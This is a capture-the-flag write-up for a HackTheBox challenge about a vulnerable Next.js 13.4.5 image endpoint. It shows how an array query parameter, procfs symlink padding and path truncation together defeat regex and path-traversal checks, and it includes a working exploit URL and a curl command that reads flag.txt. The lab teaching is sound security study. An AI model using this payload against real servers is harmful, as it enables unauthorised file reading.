$ cat writeup.md…
$ cat writeup.md…
hackthebox
Task: Next.js 13.4.5 API endpoint with regex validation and path traversal checks. Solution: bypass all three checks using array query parameter — multiline regex matches first element, Array.includes differs from String.includes, and procfs symlinks pad path length to truncate .png extension via slice(0,100).
Find the next path in your career or even some vulnerabilities along the way. Anyway, good luck on your travels!
A Next.js 13.4.5 web application with a vulnerable API endpoint at /api/team that serves team member images. The endpoint has three security checks that can all be bypassed simultaneously using a single technique.
import path from 'path'; import fs from 'fs'; const ID_REGEX = /^[0-9]+$/m; export default function handler({ query }, res) { if (!query.id) { res.status(400).end("Missing id parameter"); return; } // Check format if (!ID_REGEX.test(query.id)) { console.error("Invalid format:", query.id); res.status(400).end("Invalid format"); return; } // Prevent directory traversal if (query.id.includes("/") || query.id.includes("..")) { console.error("DIRECTORY TRAVERSAL DETECTED:", query.id); res.status(400).end("DIRECTORY TRAVERSAL DETECTED?!? This incident will be reported."); return; } try { const filepath = path.join("team", query.id + ".png"); const content = fs.readFileSync(filepath.slice(0, 100)); res.setHeader("Content-Type", "image/png"); res.status(200).end(content); } catch (e) { console.error("Not Found", e.toString()); res.status(404).end(e.toString()); } }
1. Regex Multiline Bypass (/^[0-9]+$/m)
The regex uses the m (multiline) flag, which makes ^ and $ match the start/end of each line rather than the entire string. When query.id is an array like ["1\n", "../../../../...flag.txt"], calling ID_REGEX.test(array) converts the array to a string "1\n,../../../../...flag.txt". The multiline regex matches "1" on the first line and passes.
2. Array.prototype.includes vs String.prototype.includes
When query.id is an array, id.includes("/") calls Array.prototype.includes, which checks if any element is strictly equal to "/". Since no element is exactly "/" or ".." (they contain these characters but aren't equal to them), both checks pass. This is fundamentally different from String.prototype.includes which checks for substrings.
3. filepath.slice(0, 100) truncates .png extension
The code appends .png to the id and then slices the path to 100 characters. By crafting a path that is exactly 104 characters after path.join normalization, the .png extension (4 chars) gets truncated by slice(0, 100), leaving a clean path ending in flag.txt.
The key challenge was making the normalized path exactly 104 characters. path.join normalizes away redundant ../ components, so the path "../flag.txt.png" is only 15 characters. The solution uses Linux procfs symlinks that path.join doesn't resolve (it does string manipulation, not filesystem resolution):
/proc/self/root → symlink to / (15 chars with trailing /)/proc/thread-self/root → symlink to / (22 chars with trailing /)The math:
"../" = 3 chars"proc/self/root/" × 3 = 45 chars"proc/thread-self/root/" × 2 = 44 chars"flag.txt.png" = 12 charsAfter slice(0, 100), the .png is removed.
At runtime, the OS resolves the symlinks: /proc/self/root/proc/self/root/.../flag.txt → /flag.txt.
/api/team?id=1%0a&id=../../../../proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/flag.txt
Next.js parses repeated query parameters as an array:
query.id = ["1\n", "../../../../proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/flag.txt"]
curl "http://TARGET:PORT/api/team?id=1%0a&id=..%2F..%2F..%2F..%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fflag.txt"
| Check | Expected Input | Actual Input (Array) | Why It Passes |
|---|---|---|---|
/^[0-9]+$/m.test(id) | String | ["1\n", "../../..."] → "1\n,../../..." | Multiline regex matches "1" on first line |
id.includes("/") | String | Array | Array.includes checks for exact element match, not substring |
id.includes("..") | String | Array | Same as above |
filepath.slice(0,100) | Short path | 104-char path | Truncates .png extension |
$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
$ cat pricing.md$ grep --similar